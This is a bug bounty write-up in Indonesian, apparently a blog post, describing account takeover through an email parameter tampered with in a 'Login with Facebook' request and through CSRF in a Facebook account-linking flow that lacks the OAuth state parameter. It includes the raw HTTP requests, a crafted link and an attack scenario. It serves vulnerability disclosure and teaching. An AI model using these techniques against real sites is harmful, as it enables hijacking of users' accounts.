---
layout: post
title: Account Takeover via "Oauth Facebook Misconfiguration"
date: 2019-04-24 13:37:00 PM
permalink: /project/2019-04-24-account-takeover-via-oauth-facebook-missconfiguration/
author: xhellc0de
categories: [ pentesting, csrf, idor, account-takeover ]
tags: vulnerability
comments: true
image: /images/acc_takeover.jpg
---

![Account Takeover](/images/acc_takeover.jpg)

Banyak sekali website diluar sana yang menerapkan fitur `"Login with Facebook"` dengan tujuan untuk memudahkan pengguna dalam mendaftarkan atau membuat akun pada website mereka. Namun sayangnya ada beberapa website yang kurang memperhatikan sisi keamanan dalam menggunakan fitur ini yang pada akhirnya berpotensi menjadi celah keamanan.

**NOTE:** Metode ini penulis terapkan ketika melakukan hunting pada Private Bug Bounty program, maka dari itu penulis meminimalisir penggunaan screenshot untuk melindungi privasi website yang bersangkutan.

**PARAMETER TAMPERING on "Login with Facebook"**

Penulis menemukan sebuah website dengan fitur `"Login with Facebook"`, yang menarik adalah ketika kita menggunakan fitur tersebut, data yang di-ekstrak dari Facebook (dalam hal ini alamat email) dikirim ke server target menggunakan `GET` request, dan tentunya kita dapat memodifikasi request tersebut dengan mengganti alamat email yang akan di-kirim ke server dengan alamat email lain.

```
GET /page/frames.php?f=xxx&p=xxx&jn=xxx&kode=1234567890&email=root@noobsec.org&name=Tomi HTTP/1.1

Host: redacted.co.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: [redacted]
```

Dalam hal ini, dengan mengganti parameter email dengan alamat email korban, maka kita akan dapat mengakses akun tersebut.

**CSRF on "Linked Social Media Account"**

Kali ini celah terdapat pada sebuah website yang memiliki fitur `"Linked Social Media Account"` yang pada dasarnya fungsi tersebut mirip dengan `"Login with Facebook"`. Berbeda dengan sebelumnya yang tidak memerlukan interaksi apapun, trik ini memerlukan interaksi dari korban.

![Linked Social Media Account](/images/socmed_link.png)

Normalnya, ketika kita menggunakan Oauth, Facebook akan merespon dengan memberikan dua buah parameter, yaitu `token` dan `state`. Dimana parameter state ini berfungsi sebagai Anti CSRF. Namun terdapat website yang tidak menggunakan parameter state tersebut sehingga hal ini berpotensi menjadi celah CSRF.

Berikut adalah request untuk mendapatkan token Facebook

```
GET /v3.1/dialog/oauth?response_type=code&redirect_uri=https%3A%2F%2Fredacted.com%2F&scope=email%2Cpublic_profile&client_id=00000000000 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: [redacted]
```

Dan ini adalah request ketika menghubungkan akun Facebook

```
GET /api/oauth/facebook?code=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: [redacted]
```

Dapat dilihat bahwa hanya terdapat parameter `code` pada request tersebut dan artinya terdapat celah CSRF disitu. Pada kasus ini, website target membuat *tokennya* sendiri dari Facebook token yang didalamnya tentu saja sudah terdapat parameter `token` dan `state`nya yang kemudian di-generate dan di-kirim ke server melalui parameter `code`.

Dengan begitu, attacker cukup mengirimkan link berisi `code` tersebut ke user target.

Contoh link:

`https://redacted.com/api/oauth/facebook?code=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx`

**Attack Scenario**
1. Attacker meng-generate Facebook token
2. Attacker mengirim link tersebut pada target
3. Ketika target meng-klik link tersebut, otomatis akunnya akan terhubung dengan akun Facebook Attacker
4. Attacker dapat login ke akun target menggunakan Facebook miliknya

By the way, celah ini penulis temukan pada sebuah website Trading Platform. Admin website tersebut memberikan reward atas laporan ini hehehe.

![Linked Social Media Account Reward](/images/reward_acc_takeover.png)

Demikian tulisan ini dibuat, semoga bermanfaat.

Referensi: https://medium.com/@Jacksonkv22/oauth-misconfiguration-lead-to-complete-account-takeover-c8e4e89a96a
